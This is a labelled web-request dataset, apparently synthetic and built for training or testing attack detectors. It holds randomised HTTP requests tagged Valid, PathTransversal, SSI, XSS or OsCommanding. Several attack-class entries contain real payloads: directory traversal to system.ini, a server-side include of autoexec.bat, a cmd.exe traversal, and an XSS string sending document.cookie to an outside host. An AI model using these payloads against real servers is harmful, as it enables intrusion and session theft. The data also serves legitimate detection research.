GET /i7Oohsoe/Fqj/eeeltt/lNoMAdccy7o@Vz/umoe/inV/ajJQ@RIr7tZPtYxtkd/P5wGQ7hCBlibUOD/eowteRnOWwcafaif.dll?nDveb0t=4760381&P_zftpYjm32RfE=sseb&8aosna9=eJE54xNV&4wsiidopg=116&lhl=gUvCyhvf&iehjeockt0=9849&othsgowpsRti=e.21&ura=4119498737&ofageaz8igftcNn=qJD&rv1cZP=%7Eax%2B&echog_m.=Ddso8vatfkgO HTTP/1.1
Host: www.i7no.fr
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-3;q=0.8
Accept-Encoding: *
Accept-Language: aa-iRnEaL;q=0.4, sncO-ien2s5a;q=0.8
Cache-Control: only-if-cached
Client-ip: 197.236.40.239
Cookie: n6rdcgeytds=4veTiboeAe;fe2Ft=uotn;zandCTxterm4all=eYhyf5;rEsnWociiAN3se=hscopy1Leere6wil7
Cookie2: $Version="5"
Date: Tue, 14 Apr 09 15:15:23 CET
ETag: W/"rIinki-Nfq4@qaOn"
Expect: 100-continue
From: caiN@asyn.com
If-Modified-Since: Tue, 27 Sep 05 09:23:26 UTC
If-Unmodified-Since: Thu, 16 Feb 06 16:00:44 UTC
If-Match: *
If-None-Match: *
If-Range: "1272CrnEwR9.x2yoJtQ"
Max-Forwards: 134
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="Onwtt"
Authorization: sagzi arhoteu=ahqsel
Range: 392642-8535,09679-
Referer: /strsaer/m2eFdhia/oaysfo/rmtd7g/tcwrynr.ace
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: ntNeutn (ikrl-M; lHSZ3cSKs)
UA-CPU: StrongARM
UA-Disp: 2537,365,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1799x388
Via: ery/5.3 www.lptSNtI.tiff
Transfer-Encoding: compress
Upgrade: bleion/1.0, dtdtte/9.5
Warning: 176 www.afsytan0.shtml:89321 "rtelrjklcea6e5" "Fri, 30 Oct 09 01:05:38 CET"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 7632942220156
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24165
Start - Id: 29656
class: Valid
GET /8bYwPlf_l/positionLeHhJt6/sxfali4R/nr/rda1oat6nm5inetr/sae3ERz9FLLNNizss7EX/o@N/whe/n87_LXy/8NLwpcDEEWBcvhTGvX/8r.css?osIg=ufa%5D&ztasN=gM1V9w_&DvPqQ4servicesNI=7691171&qlr=gN%25u%5Bktevbscriptgt%3Es%7EuR3&adshn=gsWl&gy=+nAprlbr%3B%7Eilbtioa%7Cp&sKNiloT=1097229&d6droirwa=rye%7E%40o+uo&aooaxs5tffiiiln=8ce&NHn.ASJQN=6&eE9oedsueann6=045&egrorXcn8E=5964 HTTP/1.1
Host: 230.38.250.7
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.1, gzip, deflate
Accept-Language: rz-afadr, SallC2oe-sg
Cache-Control: only-if-cached
Client-ip: 27.29.13.86
Cookie: daowt=r>)e/;5t1tuAs=e6;bd6exnabcaamyg=EocEcattih?ieuniona;.cB6nOYm=ytrtaee;oteasnac=r
Cookie2: $Version="70"
Date: Fri, 17 Jun 05 10:59:30 UTC
ETag: "ihpWJEqupB6sBE_6"
Expect: 100-continue
From: o1io9ajb@ssritvoml.st
If-Modified-Since: Sat, 04 Jul 09 04:11:26 GMT
If-Unmodified-Since: Wed, 17 Jan 07 15:07:35 UTC
If-Match: *
If-None-Match: "Imfwy@_IYvL3Kjztc"
If-Range: "eOu-f.0pDQewLr.04PqT"
Max-Forwards: 6650
MIME-Version: 2.0
Pragma: sejioe=hi
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: Basic VG5pZWVsOmk1QWFu
Range: 0-345
Referer: http://www.ayidt.ch/shtpr/tVsi0d/Ciih/rsn4ct9.msf
TE: gzip,trailers
Trailer: From
User-Agent: owvRkX http://www.26rcb.gov
UA-CPU: 68000
UA-Disp: 844,9536,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8055x615
Via: 1.7 www.o7rir.tiff, HTTP/8.1 www.0etis.shtml, 8.6 77.78.17.245:827
Transfer-Encoding: aofme
Upgrade: nbyrR/0.6, hSeaai/0.0
Warning: 464 239.74.250.73:950 "beogEP8sdiooeiBe" "Wed, 21 Mar 07 18:09:51 CET"
X-Forwarded-For: 1.132.193.200
X-Serial-Number: 149051815209
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29656
Start - Id: 25585
class: Valid
GET /Y3yfrom3W6pNtelnetCaJ/iolP6/evVZ/hrtznt73t.mspx?fw_V=54579&7DqPq_F=ohe26&iAnN=979205708&sashn5nSd4=840441375&ouy0eri1eauARn=tEjKy&cH=tllinHa&gia5Pay=5&yo=yT1fXLcwQU&EdsHJzTs6zx=o&glp=1Er&one=agc%40kJr4a&Wdocument@zyQJg-Oe=IrSc0tmpiorru%29oAisS HTTP/1.1
Host: www.heetfrspt.biz
Connection: nirClrEe
Accept: application/zip;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.9, identity
Accept-Language: t-Eqmc9, t-Tuala;q=0.8, seen8Io-aMs
Cache-Control: max-stale=9695
Client-ip: 107.15.10.200
Cookie: I9-DGI=aewgoArgie;Rfnmahxfi23w=6
Cookie2: $Version="718"
Date: Sat, 03 Jun 06 12:31:42 UTC
ETag: "NNBf2owU_ntQDH3l5"
Expect: 100-continue
From: camaabz@oEUygi.cz
If-Modified-Since: Sun, 22 Feb 09 21:43:33 CET
If-Unmodified-Since: Tue, 06 Nov 07 13:48:33 CET
If-Match: "pbFbhnMpeLuxlvC"
If-None-Match: "iccnfHalco2iY58_MJ4"
If-Range: Sun, 12 Jun 05 17:24:19 UTC
Max-Forwards: 2737
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: NTLM YWVSeW5uaWI1aHVnb29kbngzaW96N3Rybm5xVGxpemhsaG9tanRO
Range: 04-58
Referer: /ojowI/esctudaa.mspx
TE: chunked;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 0.0; ck-4t; rv:9.8.1) Gecko/01995326
UA-CPU: Sparc
UA-Disp: 242,0728,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 437x001
Via: 7.9 181.130.255.76
Transfer-Encoding: compress
Upgrade: ohwH/4.5
Warning: 089 33.136.50.173 "slomeeEwemt2tyii4es" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 644521
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25585
Start - Id: 36065
class: PathTransversal
GET /9egilnl0.swf?i2o=ad0&5e=utsleieqrf31a&eeolOrtdnaa=1372321082&wyIOyqOOkU=3694717488&Bhtoieratwna=odfeda5ae9%29tmImail6&bABq=9&OtaOto=38572292&hkcaeaNine=59992&epoznthu8hwr=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&gftN8wimrsTi=8225596&yIlocation75G=cte1ibSx6actetamei&er1esle=wKMs-ZT2s. HTTP/1.1
Host: 255.17.110.103
Connection: oxogb
Accept: */*;q=0.5
Accept-Charset: koi8-r, windows-1253;q=0.2, iso-8859-5;q=0.6, x-mac-ce;q=0.1
Accept-Encoding: 
Accept-Language: lssact-ht4ibeZ;q=0.8, iei-3atmqrce;q=0.9, w7-tlt87ul;q=0.2, mmraiT-9
Cache-Control: Nb=y
Client-ip: 75.78.7.59
Cookie: hdo=t3b
Cookie2: $Version="8"
Date: Sat, 19 Feb 05 06:00:10 CET
ETag: W/"d2LO2WEqbtZNb2rt"
Expect: rnvmO=lketanLl;bJytee
From: Esva@5c4oorIai.it
If-Modified-Since: Thu, 30 Aug 07 17:41:02 GMT
If-Unmodified-Since: Mon, 13 Oct 08 23:45:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Aug 09 13:31:24 UTC
Max-Forwards: 0489
MIME-Version: 1.3
Pragma: VHK=soA
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: hitiey Ai5g4Eh9=tsvbr
Range: -31,-3,49859-
Referer: /pptF/pry0au/taet/tUph7tqu/8padnii.css
TE: deflate
Trailer: Warning
User-Agent: e0fIr (dio.qmVe; eyYnXPgC9; h2cuJ60B; us5gNIYK2F; e4DQSNrf)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: HTTP/4.4 138.50.78.212
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36065
Start - Id: 40502
class: SSI
GET /m4zkz689v@/lftp3iohwerbe3/jdcB/rAC/8dFQPhcidT7@Y/hmUG/uZGIbgf_F2@9xXr/aQqtfSinasUkv.nsf?otx=uA%27e&nesl=oC.BR46UOAx&CNncVf=5dedhso&gmr9eeaierIenb=ta&htog=8&aaN=12887&ln0ke=aVwN3lY.H&Vx0bteptleSo=+p+aj&tdtm=wp-admin&noderaJgdeleteOincludeUzal=16&nazrl=d5u%3Di&lmxu=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&ho72oseebcbosjd=n%2Fooetgohed&aEii8ir=ewindow.open%7Ets&pmflEra2kMot=025548 HTTP/1.1
Host: www.olpicceoI.biz
Connection: close
Accept: application/*;q=0.0, video/quicktime;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, identity;q=0.2, gzip;q=0.4
Accept-Language: *
Cache-Control: max-age=53
Client-ip: 135.177.105.103
Cookie: siifsttpAe=Gnrsr;8stzyq=<et\d;tmst=odue
Cookie2: $Version="510"
Date: Fri, 26 Jun 09 07:13:44 GMT
ETag: "TXYIwLxIT0rM9x@OnOW"
Expect: 100-continue
From: pe1n3lw@grPaOzeer.st
If-Modified-Since: Tue, 05 Oct 04 15:30:16 UTC
If-Unmodified-Since: Sun, 10 Jul 05 18:56:49 CET
If-Match: ".EHV.eb5I7a4lNT11"
If-None-Match: "i.9Q7iGacWrChgac6Qq"
If-Range: "neTXh5W7D.Lkp8qv7V"
Max-Forwards: 6
MIME-Version: 2.3
Pragma: neh=leh
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM b2VmdHNzOHRzbmtuaHRvYW10aXNUdGVpZWVhMG5lZ2VmbnJ0OXN0cmVlZXI2dA==
Range: 51862-,762075-08,9969-2
Referer: /hOOee.msf
TE: gzip
Trailer: Warning
User-Agent: utreo5eaveitoae
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: 4.2 109.169.206.32
Transfer-Encoding: compress
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40502
Start - Id: 10547
class: Valid
GET /eoNp_kegSrjpe/s15HQUiIc2UM8PgwgTK/aeinirceesilofo/sYnn@/hNxtrSFFOZB@S1v7l/locationaMx6C_4Jwindow.openY/i0d/ucieke4ort1htt/itdthllwkuosdsow/radxE.nsf?oOs=jT24ZkKcaUYO&ekdp=eHIX&ce8mes0uO=gKSYF0blnz&iuDntun=qQpeFi&sWrslx9asufiU=8wq.W1TAtPD&GlDscriptLR=fc+e&ZvoQHnQ=90715176&mRrtauuT5a=liis7h1NR&c6L3d=uenNtgYe&oirotsswA8pio=between&Eawc=ob2d&osoF1IEsh=0811&nZcGZRV=eA HTTP/1.1
Host: www.naMA.com
Connection: keep-alive
Accept: application/*, video/mpeg;q=0.6
Accept-Charset: iso-8859-2;q=0.4, utf-8;q=0.3, cp-932;q=0.2
Accept-Encoding: compress, identity, compress
Accept-Language: chbFs-sozeSk;q=0.2, tisdnii-tetnNjtc;q=0.7, nhtbnje7-oyi9;q=0.6, ea3-2r1eyot, voyiIo-eguas;q=0.6
Cache-Control: no-cache
Client-ip: 219.6.105.217
Cookie: ado1=1;tcwideSuiti3n=hcd't;tqdtaa=ndnseaetee~0m;REPlRpf=bHk.40aZtqT;th=trml5ataIqnrllwn;mej=09
Cookie2: $Version="06"
Date: Wed, 14 Nov 07 17:36:02 CET
ETag: "CmmphlPXs7s7Y7VrxWY"
Expect: ih5D4t=coayeu
From: i5rsee@eomcf7fb.cz
If-Modified-Since: Sat, 17 Apr 04 18:10:48 UTC
If-Unmodified-Since: Sat, 22 Nov 08 16:28:26 UTC
If-Match: "3i0kCYtW92-jCFFs"
If-None-Match: *
If-Range: Sun, 03 Oct 04 12:59:20 GMT
Max-Forwards: 202
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Ithc Ynijwra=smrinc
Authorization: tMhev rebtcs=atese
Range: -028
Referer: http://www.kuuhsDdb.org/hft7ao/Syei/6d58ch/td8aOwee/nSdoli.asp
TE: gzip
Trailer: Date
User-Agent: Mozilla/9.7 (compatible; Konqueror/7.3; Mac OS X; wmoj; AutQa)
UA-CPU: 68000
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: FTP/6.2 81.11.136.57, HTTP/4.7 238.85.234.196
Transfer-Encoding: gzip
Upgrade: aianh/8.9, rdvq9p/7.9, srh/6.2
Warning: 970 239.131.64.210 "rDauEepHyyetKrx" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 703081818684687480
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10547
Start - Id: 31903
class: Valid
GET /eocttrrsnAne/cnuhoctsEa/shze/qyehenua3un8rhsse/eOi/Inrlncbe4j1a/kGgL/os4t8h/hIHSWM..Gb3X/esrssahrmH1ersahOga.bin? HTTP/1.0
Host: 111.31.251.123:80
Connection: llih8m
Accept: video/mpeg, application/*;q=0.2
Accept-Charset: x-mac-chinesesimp, x-mac-arabic, iso-2022-kr;q=0.7, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: etcte3h-onrpogB, tareCl-7sre5, od-mnpot1da, cocUs5s2-rf;q=0.5
Cache-Control: yO6tnukn='nmoina'
Client-ip: 48.40.19.225
Cookie: scxncimboauy=fFM_fc1ACb;d5y=ay;dcln=o);Qxsu3n7n=427657169;8ya5soxthe8s=atsajrupdatereein7uira?i
Cookie2: $Version="6"
Date: Sun, 16 Jul 06 11:53:02 UTC
ETag: W/"SG5jVQyCNQRd8S."
Expect: rcewehTn
From: haeoa@filcnbidra.net
If-Modified-Since: Thu, 22 Mar 07 05:55:51 CET
If-Unmodified-Since: Sat, 24 Jul 04 16:18:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1625
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: ento4a mpwtrtan=9dn1tnm
Range: 581-,06-0,27-
Referer: /a1sjW/sIiset.php
TE: deflate,chunked;q=0.3,chunked
Trailer: Expect
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 1.9; Te-8w; rv:8.2.5) Gecko/52054074
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 049x223
Via: FTP/2.6 www.neh6soew.gif
Transfer-Encoding: identity
Upgrade: oas/9.5, aueoSs/1.5, stovTn/6.0, e0ra/0.3
Warning: 730 www.0tacu.shtml:2 "asbsh" "Fri, 27 Jan 06 13:54:38 CET"
X-Forwarded-For: 163.91.80.203
X-Serial-Number: 812398
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31903
Start - Id: 34569
class: Valid
PUT /zifn/etkaAoTefIUAalltr/oaitcrtcye23.gif? HTTP/1.0
Content-Length: 159
Content-Language: ii8iodw
Content-Encoding: compress
Content-Location: /rcta/dumnt4.wmn
Content-MD5: YThleGp0Y1RhbmVybGF0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jan 06 02:08:48 UTC
Last-Modified: Wed, 12 Jan 05 18:01:09 CET
Host: www.etur9x.st
Connection: riptoU
Accept: video/*;q=0.6, video/*;q=0.8
Accept-Charset: windows-1250;q=0.0, x-mac-hebrew;q=0.6, iso-8859-2;q=0.9, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: nieA5pA-V8pwu, t-drtnzsc, t-FteTt, G-Jtsm, jiafscfu-t;q=0.3
Cache-Control: no-transform
Client-ip: 200.71.203.203
Cookie: dsxtMftgS=l Anihosr(t';ceh=tRaYJovDo45;AmriteeenYanpe=0ttt:ht09
Cookie2: $Version="5"
Date: Thu, 17 Sep 09 19:10:23 GMT
ETag: W/"LPS.Z@kNK.gtaqS"
Expect: 100-continue
From: r4o9@ecoOy.ch
If-Modified-Since: Thu, 24 Jul 08 01:16:53 GMT
If-Unmodified-Since: Mon, 10 Oct 05 02:46:33 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Nov 04 10:15:17 GMT
Max-Forwards: 52
MIME-Version: 7.7
Pragma: lia4Met=rtteoarU
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: wtetz egvtds6p=ay4sHr6m
Range: -4597,119988-57606
Referer: /Oemeosei.asmx
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 4.7; p7-ht; rv:7.6.3) Gecko/29551789
UA-CPU: StrongARM
UA-Disp: 259,255,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 811x2979
Via: FTP/5.1 www.ldEk.css
Transfer-Encoding: identity
Upgrade: aaee/2.3, sryou/1.6, tsu7z/2.8
Warning: 255 www.p5msr.tiff:10 "hpA8iaYfstbseet" 
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 26405487538799285497
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iaaxs=eaccess_logsz&sOeefsft9tacP=7404&aneshach=flPQQyZJxX&csrdgi=5dlhiE&nJNd5=%nrpto&u1eh=7375&wnotn2=f&l1iebreo4=oRIZmAXm&li=1pr4oy6hrsrO0wea&B@qCM6@siQ=ba

End - Id: 34569
Start - Id: 3918
class: Valid
PUT /tr/nDGWpn2RPeyR/oiEbxno8/wr/3x-@6bLQ0z1XWA/dsL.cfm? HTTP/1.1
Content-Length: 201
Content-Language: 0qdesls5
Content-Encoding: gzip
Content-Location: http://www.aueo0.gov/oTaO1Eh.tar
Content-MD5: ZWRqbmU3ZGVhYnR0dGtFaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Oct 06 02:02:46 UTC
Last-Modified: Sun, 31 May 09 18:18:23 GMT
Host: 103.215.103.149
Connection: HYie8fvs
Accept: image/*, audio/x-wav;q=0.8, audio/*;q=0.2
Accept-Charset: windows-1258;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=1
Client-ip: 0.40.106.248
Cookie: uYNHjhtaccesgwQ=wpol_9X;NNYym=?se;estyleRm=w3W
Cookie2: $Version="1"
Date: Sat, 27 Dec 08 13:43:19 GMT
ETag: "rqhv63Ns9@LWgw.n9Rq"
Expect: 100-continue
From: eorts@aetwspnaa.biz
If-Modified-Since: Tue, 19 Dec 06 12:31:51 UTC
If-Unmodified-Since: Fri, 25 Jan 08 17:39:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.3
Pragma: ntftfa=0nne
Proxy-Authorization: z832s 6oeibs=oiszIn
Authorization: eitDal obREhdhs=7rhaeuE
Range: 1-,-52,44-0
Referer: http://niIm.st/eFye/rwnan/Ksesisd/rihheaF/hewb.aspx
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.3 (Windows; U; Windows NT 7.1; rl-tt; rv:0.7.2) Gecko/98510272
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 698x5679
Via: 1.3 70.111.10.116:8, 2.6 www.heiueeg.png
Transfer-Encoding: rssait; amoraj=evanm
Upgrade: benr/6.9, ceas/6.6, oe8a/3.8, 3meta/5.3
Warning: 884 93.144.26.206:701 "e5urtc8hhy7ie8rxs" 
X-Forwarded-For: 151.227.134.198
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

MWfHNU59exec11Z=]aDp&Bgdoys3=;t=a3;[ilin uwherer'unionL4 &rrsirss=21980&execRHICfO=qvno-i&9xLhYdeosrkms=&afeh&suzneea84=pE9ooaaif32osoigc&K1VsystemrLjXBB0y=7&Xzp8U=ue &4onhcai=EnDeiqpatBd

End - Id: 3918
Start - Id: 46813
class: XSS
PUT /rjA/esNfar/s7AusZ/kQkHa6pp_/svxAMwe/aNvYc2q6EM/5L.exe? HTTP/1.0
Content-Length: 380
Content-Language: nr,olp
Content-Encoding: deflate
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: ZTNpb2NldEFlTnRmbm9iaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Jun 08 09:41:20 UTC
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.nsedbKed.biz
Connection: znth0at
Accept: video/quicktime, image/jpeg
Accept-Charset: *
Accept-Encoding: identity;q=0.2, gzip, gzip;q=0.5, identity
Accept-Language: t1ae-or, 1-rlr5st;q=0.8, isr-debhn;q=0.3
Cache-Control: no-store
Client-ip: 180.151.251.196
Cookie: yneuimoj=pp89;clae5headtdr=ati bh5eaxat
Cookie2: $Version="66"
Date: Fri, 26 Nov 04 09:47:17 GMT
ETag: "y@tKjzaOGXeONi4MFD"
Expect: 100-continue
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Mon, 07 Aug 06 01:32:47 GMT
If-Unmodified-Since: Wed, 08 Jul 09 08:58:31 GMT
If-Match: "IivuB7J5hPJGPwFpQvxu"
If-None-Match: *
If-Range: Thu, 09 Nov 06 12:57:01 UTC
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: http://7Iotr.gov/ri6H/evtr/sldAeu/Eod2/WoEans.zip
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: z4Oo654vVb http://www.snij.fr
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 7.3 www.r7eFut.css:6
Transfer-Encoding: identity
Upgrade: lRoine/6.1
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

taenskd=er &ns49=05648&rnTeituo=dCCT&no1i5r8=c1qpA&iTgoa6erps=%chh&EdhjafzectN9j=7frerx2li&LL3open-1n2p=1&4musLa1=mnlariy&jsShdgE=av_D&iee=wivntedoe&Nlee=3757868&iraH9hkto=<div    style=  "    background-image:    url(javascript:   [document.location.replace ('http://www.asndng.com/cgi-bin/rore.cgi'+document.cookie);]);     "    >

End - Id: 46813
Start - Id: 44057
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 67.11.71.154
Connection: close
Accept: */*
Accept-Charset: x-mac-korean;q=0.7, iso-8859-9;q=0.9, x-mac-turkish, windows-1258
Accept-Encoding: 
Accept-Language: cz-r;q=0.7, neqisoHl-s;q=0.4, o-rszsd;q=0.0, tieH-2deNnh, kmwIx-4nlrnYmr
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: otret9zat8=tz_MCrJ1Nzi;iaf4yiframeuexecT=Yiauieenr23gsm;D01V2hXoXtvc=2re
Cookie2: $Version="43"
Date: Tue, 26 Sep 06 07:58:31 GMT
ETag: W/"3JMdpZKPsFZtfWe4VBfh"
Expect: 9ngplMf=itmleued
From: ctHO@rsrvtl.cz
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Wed, 21 May 08 08:29:17 GMT
If-Match: *
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 1
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: haih yoils=Rrfosi0
Range: -0
Referer: /BEtt.shtml
TE: trailers,chunked
Trailer: If-Range
User-Agent: hIhRpw http://www.4RoA7tm.de
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/7.1 15.255.155.128, 5.6 www.5nubSctu.jpg
Transfer-Encoding: compress
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44057
Start - Id: 13762
class: Valid
GET /WTC60dS/xHdfI_YbS76hZ/cnEp/aoleeNrhtri/e5otneahbnolria6/eUupoACND/3NXyyZlvR_/h1TpzA5O-0/tS10QAZb/ed2XiRTlO@D4Ibw/jeWzs1WhtaccesWgC.htm?erti=2100&uh=eoo&Ef=utqcelglre&nkitLHe7reg3Ea=i9ua&eWdesi=ixKs HTTP/1.1
Host: 47.165.112.135
Connection: keep-alive
Accept: text/plain, audio/basic;q=0.8, audio/x-wav
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=73818
Client-ip: 58.102.229.56
Cookie: ojaEhiis=sd;benmils=39355090
Cookie2: $Version="9"
Date: Sat, 12 May 07 06:44:44 CET
ETag: "vDGVu79jEDu_3Ih"
Expect: Cgyhtte=teutet;Dhite
From: dfnFeh@eT3emeo.be
If-Modified-Since: Tue, 04 Dec 07 22:26:51 UTC
If-Unmodified-Since: Sun, 22 Oct 06 15:05:44 UTC
If-Match: *
If-None-Match: "8j4d9OL9Isj2lNA"
If-Range: Fri, 22 Jul 05 03:57:46 GMT
Max-Forwards: 7
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: Digest algorithm=ac7siaiC
Range: 78484-90830,92991-
Referer: http://www.ckmsktNr.fr/19iJpn7s/uateU7a/78tncvuo/nhtsdtae/oDea0mud.html
TE: trailers
Trailer: Cache-Control
User-Agent: awpltBr/6.2.2
UA-CPU: x86
UA-Disp: 722,0517,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x597
Via: exlrsv/1.3 84.23.136.113, 7.7 www.ao00.html, 0.6 185.236.18.55:14
Transfer-Encoding: deflate
Upgrade: oas/1.7, jn7ft/4.4
Warning: 309 www.eeiePo.jpeg "agspslaiasttonhhqdl" "Thu, 16 Nov 06 02:18:54 CET"
X-Forwarded-For: 52.127.152.38
X-Serial-Number: 26172268
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13762
Start - Id: 27130
class: Valid
GET /lY.2/srR74H4ih.shtml?h7ig=163&oawaeutetaoor=im%40QUrbUv&eun5a=dQ6TQAWuaU&gAys=jae%3AoEeescriptvee%3E%3DEpasswde%3E%5Cm&rCbE5e=fij&eeovrze=00252433&gdus=e%3B%3Deoqu4dz5erclsahFtU&oeoJ=mhp&eeinl=nowys&ddrsoaxE=6&ntsovse=Oco96unrs6%256&ysirsb3nitAerk=l%3D%24wo HTTP/1.0
Host: www.nVsegmc.net
Connection: keep-alive
Accept: text/plain;q=0.8, text/html, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: eaeaocsB-iin;q=0.3
Cache-Control: no-cache
Client-ip: 48.50.170.183
Cookie: li8nrbis=nGsr8n;spOue9h6mrshod=ey8m6erjmhv
Cookie2: $Version="926"
Date: Wed, 24 Jan 07 11:02:30 UTC
ETag: W/"OWuaFez4Pvo@NDW8RV"
Expect: 100-continue
From: eoozt@Eeh6pHmat.be
If-Modified-Since: Mon, 25 Oct 04 08:53:30 UTC
If-Unmodified-Since: Fri, 16 Oct 09 22:57:14 CET
If-Match: "IFAoZaYkaNk-x_rF3zye"
If-None-Match: *
